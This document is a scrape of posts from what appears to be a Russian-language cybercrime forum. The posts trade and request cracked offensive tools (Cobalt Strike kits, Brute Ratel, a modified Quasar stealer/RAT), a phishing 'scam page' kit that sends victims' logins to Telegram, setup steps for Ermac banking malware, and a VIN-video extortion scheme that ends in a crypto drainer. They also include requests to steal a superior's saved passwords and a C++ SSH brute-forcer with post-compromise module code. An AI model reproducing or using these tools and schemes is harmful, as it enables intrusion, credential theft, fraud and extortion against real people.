GNUnet is a peer-to-peer framework with focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service build on top of the framework is anonymous file sharing.
Click to expand...
Всем привет может завалялась крякнутая IDA Pro 7.3, 7.4, 7.5
Либо линк на скачку с паролем
Буду благодарен любой из версий
Софтина нужна под Win x64
Конвертирует mmdb файл в базу диапазонов IPv4 в формате CIDR. После
конвертации возможна выгрузка списков по геолокациям в txt.
Свежие базы можно найти в гугле запросом: "GeoIP2-City.mmdb" intitle:"index
of"
![prnt.sc](/proxy.php?image=https%3A%2F%2Fimage.prntscr.com%2Fimage%2Fr7BaK6ubS- SFWevXVZE00w.png&hash=17f307916233820c521108647673036c&return_error=1)
Captured with Lightshot
prnt.sc
anonfiles.com
пароль: xss.is
![yadi.sk](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F2g2fARP6rvC7jZlVDSInCjAxDpF.png&hash=8b1240412df95199c0fc707aab45ca52&return_error=1)
Посмотреть и скачать с Яндекс Диска
![yadi.sk](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F5hb_sU044zVfPgNsMKf8pNs2_6H.png&hash=7a8adcf3b9b4977c20c8df73c9c222b3&return_error=1) yadi.sk
](https://www.virustotal.com/gui/url/628bd82d0b09a9134568e7ea8cb760e418e944ccc44c938e0e3632305a064a08/detection)
VirusTotal
www.virustotal.com
Подкиньте софтину для чека на различные cms (достаточно wordpress) по листу. Все что нашел в паблике это чек на сингл таргет либо максимально медленное говно
The best RMM?
Hello, I created this topic to express my interests in RMM Soft and which one
I think is the best for work in this field. I've been using the Soft for quite
some time, and I've come to the conclusion that MeshCentra
l is without a doubt the best. Think
otherwise? I'd love to argue below.) Now why would I make such a claim
compared to all other RMM soft? Well, for one, she is extremely portable and
runs on all major operating systems. (linux, bsd, android, windows, and
macOS), as well as support for Active Management Technology (Intel AMT). She
can be ran completely hidden (requires admin) and has the usual RAT-like
capabilities. Such as infos, shell (CMD), desktop interaction (RDP, VNC) and
file viewer.
Server:
The server is written in NodeJS it can be installed on many operating systems
including Windows, Linux. Refer to the installation
guide, the
server can be installed both on local computers and on VPS/RDP for computers
outside your network. You can also install it on other devices like a
Raspberry Pi all the way to $1,000 per month dedics.
Agent:
The agent that runs on computers and connects back to the server to allow for
remote control. The agent supports Windows, many different Linux
distributions, macOS and FreeBSD. As well as support for different processors
such as x86-32, x86-64, ARM, MIPS. Not to mention an array of cli arguments.
Spoiler: Arguments:
Mesh Agent available switches:
run Start as a console agent.
connect Start as a temporary console agent.
start Start the service.
restart Restart the service.
stop Stop the service.
state Display the running state of the service.
-signcheck Perform self - check.
-install Install the service from this location.
-uninstall Remove the service from this location.
-nodeid Return the current agent identifier.
-info Return agent version information.
-resetnodeid Reset the NodeID next time the service is started.
-fulluninstall Stop agent and clean up the program files location.
-fullinstall Copy agent into program files, install and launch.
The following switches can be specified after -fullinstall:
--WebProxy="http://proxyhost:port" Specify an HTTPS proxy.
--agentName="alternate name" Specify an alternate name to be provided by the agent.
Install:
Buy a _Ubuntu _20.04 VPS, i recommend
bearhost or zservers
but any will do, once bought run the one command install + run. (Replace
127.0.0.1 with your vps ip.)
Spoiler: Install:
Code:Copy to clipboard
sudo apt update && \
sudo apt install -y ca-certificates curl gnupg && \
sudo mkdir -p /etc/apt/keyrings && \
curl -fsSL https://deb.nodesource.com/gpgkey/nodesource-repo.gpg.key | sudo gpg --dearmor -o /etc/apt/keyrings/nodesource.gpg && \
NODE_MAJOR=20 && \
echo "deb [signed-by=/etc/apt/keyrings/nodesource.gpg] https://deb.nodesource.com/node_$NODE_MAJOR.x nodistro main" | sudo tee /etc/apt/sources.list.d/nodesource.list && \
sudo apt update && \
sudo apt install -y nodejs && \
node -v && \
sudo ufw allow from any to any port 80,4433,443 proto tcp && \
mkdir mc && \
cd mc && \
npm install meshcentral && \
node node_modules/meshcentral --cert 127.0.0.1
Hmm?
In retrospect, I think the only RMM soft that comes anywhere close to
mesh would be
atera (in my opinion) I may be wrong). The only
thing that I don't like is that it requires at least local administrator
privileges, but what doesn't these days? Overall 10/10 i recommend this for
work.
Всем привет, нужен желательно бесплатный чекер почт. Пробывал крякнутый HMC 2.2 и 1.8 но они плохо работают. Есть ли бесплатные аналоги?
**[size=large] Zeus Grabber v1.0 (GUI)[/size]
Multi-Function Domain Tool:** Reverse IP, IP Generator, Domain-to-IP Conversion, Google Search Dork & SQli, Zone-H
Zeus Grabber is an open-source multi-tool for managing domains, automating reverse IP lookups, generating random IPs, converting domains to IPs, performing Google searches, and Zone-H Grab Domain.
Note: I have an announcement! Google and Zone-H Grabber was originally coded in 2022 (copyright 2022), but I have made it public in 2024 with updated code to further improve its performance and usability.
Click to expand...
Enjoy using this tool for free!
Screenshots:
Reverse IP![](/proxy.php?image=https%3A%2F%2Fraw.githubusercontent.com%2Fdrcrypterdotru%2FZeus- Grabber%2Fmain%2Fdemo%2Fdemo_1.png&hash=faa2af632588de7105bb40a38f05278e)
Generate IP![](/proxy.php?image=https%3A%2F%2Fraw.githubusercontent.com%2Fdrcrypterdotru%2FZeus- Grabber%2Fmain%2Fdemo%2Fdemo_2.png&hash=1675dab2dd5482d779c7bb49fc608a4b)
Google Grabber![](/proxy.php?image=https%3A%2F%2Fraw.githubusercontent.com%2Fdrcrypterdotru%2FZeus- Grabber%2Fmain%2Fdemo%2Fdemo_3.png&hash=72a1e491338c6c57a9ce92f390a248cb)
Zone-H![](/proxy.php?image=https%3A%2F%2Fraw.githubusercontent.com%2Fdrcrypterdotru%2FZeus- Grabber%2Fmain%2Fdemo%2Fdemo_4.png&hash=4beeae15453a44195d0359b21d05d4e8)
Installation
[size=medium]Run from Source (Python)[/size]
You must have at least 1 message(s) to view the content.
[size=medium]Run from EXE (No Installation Needed)[/size]
You can download and run the executable from the Releases section. No Python installation is required, just one click to run.
Features
Reverse IP
IP Generator
Google Search Dork & SQLi
Zone-H Grab Domain
[size=medium] Reverse IP[/size]
Select a TXT file (IP_List.txt) containing a list of IP addresses.
Choose API #1 , API #2 , or Both APIs. Note: Using both might be slower depending on your network speed.
Save the results as a .txt file.
Click Start to begin the reverse IP lookup.
[size=medium] IP Generator[/size]
This tool offers two IP generation options:
Convert Domain to IP:
Load your domain list (Domain_List.txt).
Save the generated IP list as a .txt file.
Click Start Dom2IP.
Generate Random IPs:
Input the number of IPs you want to generate.
Save the results to a .txt file.
Click Generate IP.
[size=medium] Google Search Automation[/size]
Input your search queries (dorks) into Dork_List.txt, either one per line or multiple at once.
The program automates Google search for each query. Just like using Google manually but faster!
Important : Google captcha bypass is not supported, so you’ll need to solve captchas manually when prompted.
Save the results in two formats:
Domain format (e.g., google.com).
Full URL format (e.g., example.com/product.php?id=...).
Or both formats.
If you want to exclude certain domains, use the Block Domain feature at the bottom of the dork list and save before starting.
[size=medium] Zone-H Username Input[/size]
Input the Zone-H Grab Domain you want to search.
Click Save and then Start-H to retrieve data.
Note : Captchas need to be solved manually, including for Zone-H searches.
How to Run
After installation, launch the application by running:
Code:Copy to clipboard
python Main.py
Or, use the executable version available in Releases for running Zeus-Grabber.
Reported with Total-Virus : Link TV
MD5 : fa9991835a099c7168c34c4f1856fc59
SHA-1 : 1374fcf2fa3436f12f18126545b48cdc8ae3c53a
SHA-256 : f50b0e471436f99a0a5ecec3dca12279bacb3f2f3a6e7fdbd83053ac27a00219
Набор софтин как я понял для для автоматических АЗС.
VT пиздец:
https://www.virustotal.com/gui/file...e45144601cfea28dfea6b86312f1df7b681/detection
Скачать: (на свой страх и риск)
You must have at least 5 reaction(s) to view the content.
Сливаю вам старый метод, может и сейчас что байпассит.
Без бекдоров и прочего говна даю вам чистый сурс в ваше пользование.
LEAK BY @NOCOREBOTNET
Изначально создавалось для продажи, но увы никому ненадобно.
Топик со скриншотами: /threads/100155/
Полноценный фейк с работающей системой регистрации и авторизации, а так же dashboard якобы с функционалом создания карты.
moon.sql импортировать в PMA и залить все файлы архива в корень.
в файле info.php указываем btc-address и путь к QR.
dwnl:
You must have at least 30 message(s) to view the content.
Для желающих отблагодарить копейкой: bc1qykwnd4fcadz6fx79csy29vdnlcfjhfxhnfms86 (бтц)
Приветствую. Расскажите, какой софт на WINDOWS вы используете для повседневных
задач? И в рабочей среде?
Ваш личный топик будет полезен не только для меня, но и возможно для других
пользователей которые задались этим
вопросом
юзайте строго на вм или дед
link:https://mega.nz/file/CFlh2LbA#Co6C5JPlhKYYerw65WwMjrJdDQL8uFXzXbPuOuSvnGg
pass:xss.is
заранее спасибо
Нужно проверить, заняты ли имена пользователя gmail или нет. Подскажите софт,
который поможет это сделать.
Спасибо заранее
Pentest Panel для работяг
![filetransfer.io](/proxy.php?image=https%3A%2F%2Ffiletransfer.io%2Fdist%2Ffiletransfer- social- en.389488efe49681ac059b218c21161d72.png&hash=27d36b435e98dc48bfe907d477f79533&return_error=1)
](https://filetransfer.io/data-package/13FGnVyh#link)
Size of the data package: 10.26 MB. Free transfer of up to 6 GB of photos, videos and documents. Send large files via email or a link to share. No registration, no ads, just simple file sharing!
filetransfer.io
Ребят есть у кого нибудь кряк кракс на версии 6.7 или 7.3? Очень необходимо был бы рад если можете скинуть
ищу андроид ратник платный . желательно ссылку сразу
Встала задача узнать пароль от учетной записи СРМ начальства.
Есть ли решение что бы я мог вставить USB устройство в ПК и получить
сохраненные пароли?
Физический доступ к ПК у меня есть, пароль на винду известен.
Для особо тревожных - Я НАХОЖСЬ НЕ В РОССИИ !
Уважаемое комьюнити, посоветуйте или поделитесь нормальным
парсером/экстрактором строк url:log:pass
Также посоветуйте чекер WP/OpenCart/Joomla/Magento/etc.
Can anyone recommend fast way or software to extract leads for URL (domain)?
node private.js https://website.com time proxyfile threads rate cookie
VT - [youk](https://www.virustotal.com/gui/file-
analysis/MzBmMDM0NWRhYWNkZGJiNTFkYzhlZDA2ZDc0YTRiNmE6MTcwNjY5MTQ5MA==)
Download - https://files.fm/u/dmaw6vgwha
Всем привет!
Интересует четкий алгоритм того, как устроен и как работает крипто дрейнер.
Пожалуйста распишите поэтапно как именно он работает технически, на практике.
Hello everyone
I am interested in a clear algorithm of how the crypto drainer is designed and
how it works. Please describe in stages exactly how it works technically, in
practice.
General Emails Scam Page v2.5
The features of this page are listed below.
•Auto detect device
•Detect device desktop or mobile and preview support version page
•Support all devices
•Fast and responsive page
Email Validation for Data AccuracyEnsures data accuracy by implementing email
validation, alerting users to the correctness of their entered email
addresses.
Email Image Displaydynamically retrieves and shows the picture or logo
connected to the email address given.
Dynamic Favicon Presentationmakes the scam page appear more legitimate by
dynamically displaying the favicon, a little icon, connected with each email
domain to create an aesthetically appealing depiction of those domains.
Visual Branding with Domain Informationintegrates branding components by
placing the favicon or logo next to the email domain name, giving consumers a
branded and aesthetically appealing login experience.
Intelligent Page Title UpdateAdjusts the page title dynamically to display the
initial character of the email domain in capital letters, adding to a
customized and branded experience that makes the scam page seem more authentic
and believable.
•Every email account (Gmail, Aol, Hotmail/Outlook, Office365, Yahoo, etc.) has
a dedicated login script embedded in it.
•Anti Skip Script
•Prevents scripts & Antis to advade bots n empty rez
•Smart Input Form
•Get Device Info
•Get Browser Info
•Get Device Info
•Deliver Rez to Telegram
•Multiple type rez deliver modes
•Deliver Rez to Telegram
•Deliver Rez to Whatsapp
•Save Rez txt file in host as backup
Automatic Redirection to Email Domains Provides seamless user experience with
automatic redirection to the relevant email domain after a successful sign-in,
ensuring users land directly on their email
Ищу актуальный кряк для Elcomsoft Phone Breaker Forensic Edition, так как отдавать 48к руб за лицензию не хочется для разовой задачи.
Нашел на рутрекере - Elcomsoft Phone Breaker v9.40.35257 Forensic Edition - но там не работает как раз та функция которая мне нужна, а именно работа с извлечением ключей из icloud.
И сразу под шумок, Elcomsoft Forensic Disk Decryptor, так как задача у меня сложная.
Может у кого есть, был бы благодарен. Всех обнял.
SearchiX. Парсер поисковой выдачи Google, Yandex, DDG, Bing
Вводим нужный дорк, получаем результаты поиска в нескольких поисковиках, ищет
столько
URL-ов сколько указываете в поле Count. Интерфейс простой и понятный,
инструкция
не прилагается. При необходимости исходный код в пм.
Ожидайте версию 2.0 без лагов и с поддержкой более 10 поисковых систем а
так же
с учетом ваших правок; пожелания под темой будут учтены.
Скачать:
https://bayfiles.com/R642l1Xdyc/SearchiX_1.1_-_KERNELRW_exe
Вт:
https://www.virustotal.com/gui/file/1b41098797259014f06b3dbd44532e1b38e47cf23ddfbf12ef428713b8c09bed
Hello, I came across the malware DarkGate Loader. The individual who
authored this charges an insane amount. I believe in the six figures, but I
personally don't have the capacity to crack it. Maybe someone else can.
Download
VT
Some notable articles pertaining to the malware.
![www.splunk.com](/proxy.php?image=https%3A%2F%2Fwww.splunk.com%2Fcontent%2Fdam%2Fsplunk- blogs%2Fimages%2Fen_us%2F2024%2F01%2Fdarkgatemalwareheroimage.png&hash=00d2a8611a513e56113a8773f8dc1c19&return_error=1)
The Splunk Threat Research Team (STRT) provides a deep dive analysis of the DarkGate malware and its use of AutoIt.
www.splunk.com
![www.techrepublic.com](/proxy.php?image=https%3A%2F%2Fwww.techrepublic.com%2Fwp- content%2Fuploads%2F2023%2F09%2Ftr_09142023-darkgate-loader-malware-microsoft- teams.jpg&hash=57c102e44c76a88def48993db2aef20d&return_error=1)
](https://www.techrepublic.com/article/darkgate-loader-malware-microsoft- teams/)
Get technical details about how this new attack campaign is delivered via Microsoft Teams and how to protect your company from this loader malware.
![www.techrepublic.com](/proxy.php?image=https%3A%2F%2Fwww.techrepublic.com%2Fwp- content%2Fthemes%2Ftechrepublic-theme%2Finc%2Fimages%2Fapp- icons%2Ffavicon-32x32.png&hash=61b482fbaba56f15a56225571a7ecf6c&return_error=1) www.techrepublic.com
![www.trendmicro.com](/proxy.php?image=https%3A%2F%2Fwww.trendmicro.com%2Fcontent%2Fdam%2Ftrendmicro%2Fglobal%2Fen%2Fresearch%2Fthumbnails%2F24%2FDarkGateSmartScreen- Main.jpg&hash=6f23bc3bb4bb51ebcfb6d1b9a0006197&return_error=1)
SmartScreen Bypass in Zero-Day Campaign ](https://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate- operators-exploit-microsoft-windows-sma.html)
www.trendmicro.com
Quasar Malware Modified By** Mr Malfoy**
What did i change?
Code:Copy to clipboard
Plugin System
HVNC Module
System Information (Version, CPU, GPU, RAM, IPs, BSSID, Location, Screen Metrics, Installed Apps)
Chromium-Based Browsers (Passwords, Credit Cards, Cookies, History, Autofill, Bookmarks)
Firefox-Based Browsers (Database Files, Cookies, History, Bookmarks)
Internet Explorer/Edge (Passwords)
Saved WiFi Networks & Scans around Device (SSID, BSSID)
File Grabber (Documents, Images, Source Codes, Databases, USB)
Detection of Banking & Cryptocurrency Services in Browsers
Gaming Sessions (Steam, Uplay, Battle.Net, Minecraft)
Installation of Keylogger & Clipper
Screenshots (Desktop & Webcam)
VPN Clients (ProtonVPN, OpenVPN, NordVPN)
Crypto Wallets
Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, AtomicWallet, Guarda, Coinomi, Litecoin, Dash, Bitcoin, etc.
Browser Crypto Wallet Extensions (Chrome & Edge)
Binance, Coin98, Phantom, Mobox, XinPay, Math10, Metamask, BitApp, Guildwallet, Iconex, Sollet, Slope Wallet, Starcoin, Swash, Finnie, KEPLR, Crocobit, OXYGEN, Nifty, Liquality, Auvitas Wallet, Math Wallet, MTV Wallet, Rabet Wallet, Ronin Wallet, Yoroi Wallet, ZilPay Wallet, Exodus, Terra Station, Jaxx, etc.
Messaging Sessions, Accounts, Tokens
Discord, Telegram, ICQ, Skype, Pidgin, Outlook, Tox, Element, Signal, etc.
Directory Structure
FileZilla Hosts
Process List
Product Key
**Source Code + Build:
**
![filetransfer.io](/proxy.php?image=https%3A%2F%2Ffiletransfer.io%2Fdist%2Ffiletransfer- social- en.389488efe49681ac059b218c21161d72.png&hash=27d36b435e98dc48bfe907d477f79533&return_error=1)
package/ujJHoTDy#link)
Free transfer of up to 6 GB of photos, videos and documents. Send large files via email or a link to share. No registration, no ads, just simple file sharing!
filetransfer.io
**Looking to Buy Private Stealer?_Ph4nt0m Stealer By MrMalfoy
Ruby:Copy to clipboard
https://shorturl.at/fktzM
_**
**В прошлой статье выставлял большой список слитых бдшек, сейчас выставлю софт
для запросов по бдшкам. Софт работает, но при большом кол-ве бдшек не
проверял.
Как все правильно сделать:
1: **Создаем на рабочем столе папку
2: Закидываем софт и создаем в новой папке папку с названием "bd"
В папку "bd" мы закидываем наши базы данных(не папками, не зипами и тд, а
именно файлом: sql, txt и тд)
3: Запускаем софт и пишем данные по которым проводим поиск(номер, никнейм,
имя и тд)
Заранее предупреждаю, софт не мой, человека нет на форуме. Так же антивирус
может ругаться из за билдов на питоне.
Отчет с вирустотала:
https://www.virustotal.com/gui/file/5ea63e211ecff06012f55e60f95ac5d4d259a778afa8b47940774d1f7b267f04
Софт: https://disk.yandex.ru/d/wHBhpGkOPv_pCw
Отчет с др. веб скана:
ЗАПУСКАТЬ НА ВИРТУАЛКЕ!!!!!
Download Link: https://ufile.io/w8u3iao4
VirusTotal Link: https://www.virustotal.com/gui/file...5a567d5cad363dca035109b68444b315e3a?nocache=1
Click to expand...
You must spend at least 356 day(s) on the forum to view the content.
Hi Cypher is a scammer and I received files from someone who was scammed by
him. I would be happy if someone crack this app and share it with us. auth
system made with keyauth i guess
Also it have backdoor stay safe
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
GJq0epWX8rVnA338E)
mega.nz
BRC4 1.4.5 Cracked Version
![anonymfile.com](/proxy.php?image=https%3A%2F%2Fanonymfile.com%2Fimg%2Flogo- anon-warning.png&hash=1c10f8cb23efa71dd03be05d43e1c355&return_error=1)
](https://anonymfile.com/p593g/bruteratel-145scandinaviandefenselic20240701.zip)
File BruteRatel_1.4.5.Scandinavian_Defense_Lic_20240701.zip hosted on ANONYMFILE
anonymfile.com
Есть ли готовый хакерский софт для управление другим телефоном анонимно?
Всем привет, нужен браузер для спама. Нужно чтобы в браузере была возможность создовать большое количество профилей.
Пример; Профиль 1
Вовод даных (ос, разрешение, браузер и.т.д.) ПК руками или автоматическая
генерация. + прокся
Чтобы было удобно переключаться между профилями. Посоветуйте варианты! Всем бобра)
I need Apple Account Checker, please contact me
Всем привет. Где можно взять софт для автоматизации спама по чатам в телеграмме? Готовая база чатов имеется
Cебе забираю только **Facebook + Twitter
Сервисы: **
Steam; Roblox; HumbleBundle; FreeBTC; Coinbase; YouTube; Twitch; TikTok + TikTok ADS; Instagram; Twitter + Twitter ADS; Netflix; Amazon; WordPress; PSN; Genshin; Tarkov; GPay; Gmail; Yahoo; Rambler; Yandex; Mail.ru; eBay; FunPay; LinkedIn; Reddit + Reddit ADS Vinted
[ Introducing the Mutator Kit: Creating Object File Monstrosities with
Sleep Mask and LLVM ](https://www.cobaltstrike.com/blog/introducing-the- mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm)
This blog introduces the mutator kit, which uses an LLVM obfuscator to break in-memory YARA scanning of the sleep mask.
![www.cobaltstrike.com](/proxy.php?image=https%3A%2F%2Fwww.cobaltstrike.com%2Fapp%2Fuploads%2F2023%2F06%2Fcropped- android- chrome-512x512-2-32x32.png&hash=9028a511d8891ad9d1882a20b254e9fa&return_error=1) www.cobaltstrike.com
Click to expand...
- udrl-vs
- udrl
- sleepmask
- resource
- process_inject
- mutator
- mimikatz
- artifact
Code:Copy to clipboard
c2e1ba266aa158636ea3470ba6ab7084bb65d6811131c550d8c6357ca0bbaedd
https://mega.nz/file/nSglxK7D#_uYA9Qus9pOaQj0HVccjNvt0q3SsR362S_fC76_Yo0I
Credit to: Pwn3rzs
PD: Don't waste your money. This tools has been release for free long time
ago.
Приветствую ищу годный софт расмотрю все предложения по поводу оплаты обсудим
добрый день,имею большой объем выгруженных с логов строк url:login:pass
(5ккк,~250 гб),очевидно notepad++ и emeditor не справляются с таким
объемом,для поиска строк по доменам находил софт на golang и писал свой скрипт
на питоне,однако все бессмысленно и софты останавливаются на небольшом объеме
есть ли какой-то софт или способ поиска строк по доменам или разделения по
объему в файле такого размера?
Всем привет, подскажите какой нибудь годный чекер/сортер логов. Все что в паблике нашел кривое, спасибо заранее
Во-первых, хочу сказать спасибо форуму за прекрасный конкурс.
Этот проект еще не на финальной стадии, и, очевидно, это не заявка на победу или даже на призовое место!
Итак, у меня была идея написать универсальный фейк магазин цифровых товаров.
Частично я столкнулся с архитектурными проблемами, и они помогли мне понять,
как делать лучше. Частично же — с ограниченным временем и тем, что я не
успеваю реализовать все, что планировал.
Дизайн проекта абсолютно уникален, поскольку никакого дизайна не было, я
просто делал все со своих мыслей)
Поскольку я не успеваю закончить все к 3 марта, решил выложить что-то, чем
ничего. Мне кажется, это можно использовать.
Я планирую выпустить вторую версию с админ-панелью, оплатой криптовалютой, а
также измененным дизайном страницы пользователя.
Если кто-то планирует использовать это в реальности, смело пишите в лс, отвечу
на все вопросы.
Стек: Next.js + Redux Toolkit + MongoDB
Остальные библиотеки можно найти в файле package.json.
Как запустить проект:
Некоторая информация:
Проект:
https://mega.nz/file/JWVTlQxY#DT0TTbdA4DrT84pkOkOScxmxSWAf9qhYU5RZmn48xQs
Пароль от архива - xss123.is
Если нужно перезалить куда-то, скажите, сделаю.
В остальном, я думаю, все понятно. Ниже представлены несколько фотографий проекта.
Spoiler: экраны
Vehicles | Скрапер аукционов (для транспортных средств) с последующей отработкой
Для чего это?
В большинстве стран СНГ существуют гос. структуры, которые отвечают за
регистрацию автомобилей и поддерживают базы данных с информацией о них. Эти
базы данных содержат информацию о владельцах, регистрационных данных,
техническом состоянии автомобилей и других важных аспектах
В США существует несколько баз данных, содержащих информацию о VIN (Vehicle
Identification Number), но нет единой централизованной базы данных ,
доступной всем гражданам или компаниям. Вместо этого информация о VIN хранится
и управляется различными государственными и частными организациями. Мы
постараемся стать одной из таких "частных организаций"
Цены на удаления с различных каталогов (у самых жадных) могут доходить до $100
за 1 вин номер
Я вижу два способа монетизации этого проекта:
1. Создание собственного каталога транспортных средств (сайт) с последующим
удалением из базы
Тут есть ньюансы: Во-первых это требует определенных навыков и во-вторых не
каждый захочет с этим заморачиваться
2. Создание сетки ютуб каналов с данными из каталога с последующим удаленем
загруженных видео - мы займемся этим способом.
Объясню почему. Гугл индексирует такие видео в течение 6 часов. То есть при
поиске вин номера наши видео будут доступны в поисковой выдаче на первой
странице всего за 6 часов
Что это?
Скрипт для автоматизированного и удобного сохранения данных о транспортных
средствах + сборка видео из сохраненных изображений
Spoiler: Скриншот работы
Сбор происходит с каталога UCARS. Как они сами пишут о себе - "наш ресурс предоставляет доступ к аукционам автомобилей в США, Канаде, Европе, ОАЭ и Южной Корее. В нашем каталоге вы можете просмотреть всю информацию о предстоящих и проданных лотах на аукционах со всей подробной информацией (VIN, информация о продавце, ставки, повреждения, фотографии и технические характеристики автомобиля). Также в каталоге вы можете использовать фильтры по аукционам, моделям, маркам, годам, диапазону ставок и многое другое, чтобы найти нужные вам автомобили"
Что ты смог?
Возможность выбора аукционов для парсинга по его статусу:
Текущие аукционы (активные лоты, по которым проходят ставки)
Завершенные аукционы (проданные лоты)
Для этих категорий:
Парсинг нескольких страниц (или всех сразу), начиная с первой (по свежести)
Парсинг определенной страницы (текущего или завершенного аукциона)
Создание папок с лотами:
Пример - 1FMCU9J94LUA39363 (вин) 2020 (год) Ford Escape Titanium (название)
Внутри каждого лота создается папка Images - изображения по лоту и видеоряд
созданный из изображений в формате .mp4
Spoiler: Выглядит вот так
Что дальше?
1. Создание/покупка ютуб каналов
2. Оформление каналов (добавляем в описание свою почту/телеграм для связи)
3. Поскольку наши сгенерированные видео уже имеют нужные названия просто
загружаем их на каналы и добавляем описание к видео - дублируем название видео
и указываем свои контакты под каждым видео (чтоб наверняка)
Spoiler: Пример загруженного видео
4. Ждем клиентов по нашим контактам
Небольшая подсказка:
В сутки на один свежий канал можно загрузить только 10 видео. Но можно
подтвердить номер телефона и предоставить документы - после этого возможности
расширятся (как говорит сам ютуб)
Клиент стучит по твоим контактам и спрашивает как удалить это видео и сколько
это стоит?
Сообщаем клиенту, что видео удалим прямо сейчас, а с индекса гугла оно уйдет в
течение 24 часов. Дальше перед нами открываются два варианта отработки
клиента:
Вариант 1 - если клиент может оплатить криптой, то просто принимаем оплату и
удаляем видео
Или скидываем "процессинг" с инвойсом (например о добровольном донате 5 USDT)
c прикрученным дрейнером
Spoiler: Гейт для дрейнера
*Исходник прикрепил к сообщению - cryptoGateway.zip
Вариант 2 - если клиент не может оплатить криптой и вы можете принять деньги
на (условный) PayPal. Принимаете платеж - удаляете видео (принимайте в учет
время на отмену транзакций)
Тут также можно обыграть историю со сбором CC, но я от этого далек, поэтому
никакой информации дать не могу
Что мы получили?
План минимум: оплату на криптокошелек или PayPal
План максимум: посадили клиента на дрейнер
За наши простые действия мы немного (или много в случае с дрейнером)
заработали. Надеюсь вы найдете самых жирных клиентов
нужен кряк AMS Enterprise
буду очень
благодарен
Ermac Kaynak Kodunun Çalışma Versiyonu
Gereksinimler Ubuntu 20.04 22.04 4 CPU 6GB Ram Min.
Düzenlemek
mkdir/var/www
Zip Dosyasını /var/www adresine yükleyeceksiniz.
1- sudo apt güncellemesi
2- sudo apt-get install build-essential -y
3- sudo apt-get install unzip
4- .env Dosyasını Düzenleyin.
5- kurulumu yap
6- bağlantı noktaları yapın
7- env'yi yap
8- inşa etmek
Kimlik: kök
GEÇİŞ: kök
Derleyebileceğiniz apk'yi yükledim.
İlgilenen varsa inşaatçıyı kodlayabilirim.
Panel Bağlantısı
Convenient file sharing. Think of it as Pastebin for files. Registration is not required. Large files are supported.
filebin.net
APK BAĞLANTISI
Всем привет, решил попробовать поучаствовать в конкурсе.
Представляю вам брутилку ssh с системой модулей.
Думаю, что делает этот софт всем понятно. Но что такое система модулей и как я
её вообще запихнул в брут?)
Если Вы занимаетесь брутом, то скорее всего вы что-то потом делаете с этими
доступами, верно?
Например, вы заливаете туда бэкдоры или ещё что-то.
Вероятно, вы это делаете руками или при помощи нескольких софтов.
Собственно, идея брута не нова, но я решил объединить 2 задачи в одну
программу. Так еще и сделать универсальной для всех.
Вся суть модулей в том, что вы их сами можете писать. Модули если что для
брута и выполняются у вас на ПК.
Дальше напишу чуть подробнее про модули, но сейчас я должен расписать про сам
брут.
Брут написан на C++. Для подключения к SSH использует библиотеку libssh. Все
гуды сохраняет в базе sqlite.
Я не писал отдельного софта для просмотра базы, поэтому вам придется
пользоваться sqlitом и писать запросы самостоятельно
)
Хотя, я думаю, что вы будете в силах закодить скриптик на питончике для того,
чтобы делать разную выборку.
Когда доступ был успешно получен, брутилка собирает доп инфу о системе. Всю
эту инфу можно собрать из вывода uname с разными параметрами.
Помимо инфы о системе брут проверяет права. Он определяет есть ли у нас root
права или есть root права через sudo (мы состоим в группе sudo).
Запись в базе выглядит так:
Code:Copy to clipboard
sqlite> select * from GOODS;
10.0.3.15|22|1|0|root|123|uid=0(root) gid=0(root) groups=0(root)|x86_64|6.1.0-17-amd64|#1 SMP PREEMPT_DYNAMIC Debian 6.1.69-1 (2023-12-30)|debroute|2024-02-18 14:34:26
ip, port, rooted, haverootbysudo, username, pass, groups, arch, kernel release, kernel version, hostname, дата добавления
В бруте предусмотрен многопоток. Потоки ставятся автоматически, чтобы не давать возможность ставить 200 потоков и жаловаться на скорость. Хотя скорость всё равно упрётся в интернет канал.
Теперь про систему модулей.
Что такое модуль? Модуль это скомпилированная динамическая библиотека (она
имеет расширение .so).
Вы можете в теории писать модули на любом языке, но я рекомендую выбирать C++,
потому что данные, которые передаются в модуль содержат классы из c++ stl.
Модуль должен экспортировать функцию
extern "C" void module_callback(SSH* _ssh, target_info* ti)
Она будет вызвана, когда будет получен доступ и запись будет сохранена в базе.
(вызов этой функции thread-safe. То есть вы можете не бояться, что вашу
функцию дернут сразу из нескольких потоков)
Немного разберемся, что за параметры я передаю туда.
SSH* это указатель на класс SSH, через который можно взаимодействовать с
сессией. Например, выполнить команду (а собственно больше ничего и не нужно
).
target_info* указатель на структуру target_info, которая содержит данные по
хосту, которые были записаны в базу. В том числе есть ли root доступ.
То есть теоретически, вы можете создать модуль, который проверяет наличие рут
прав и создаёт какой-нибудь сервис)
Фантазировать можно долго...
Вот пример модуля для вывода в консоль (я не делал вывод в консоль в самом бруте)
C++:Copy to clipboard
#include "ssh_controller.hpp"
#include "target_info.hpp" // такого файла в проекте вы не найдете. Вам нужно будет его создать.
#include <iostream>
extern "C" void module_callback(SSH* _ssh, target_info* ti)
{
if(ti)
std::cout << ti->ip << ' ' << ti->port << ' ' << ti->username << ' ' << ti->password << std::endl; // можно вывести еще какие-то поля
}
extern "C" void _fini()
{
// тут очистка после выгрузки модуля
}
extern "C" void _init()
{
// тут может быть инициализация модуля
}
target_info.hpp
C++:Copy to clipboard
#ifndef _ti_hpp
#define _ti_hpp
#include <string>
struct target_info
{
std::string ip;
std::string username;
std::string password;
std::string groups;
std::string arch;
std::string kernel_release;
std::string kernel_version;
std::string hostname;
ushort port;
bool rooted;
bool rootedBySudo;
target_info(std::string&& user, std::string&& pass) : username(std::move(user)), password(std::move(pass)), rootedBySudo(false)
{
if(username == "root") {
rooted = true;
}
}
void set_groups(std::string&& groups_list) {
groups = std::move(groups_list);
if(groups.find("sudo") != std::string::npos){
rootedBySudo = true;
rooted = true;
}
}
};
#endif
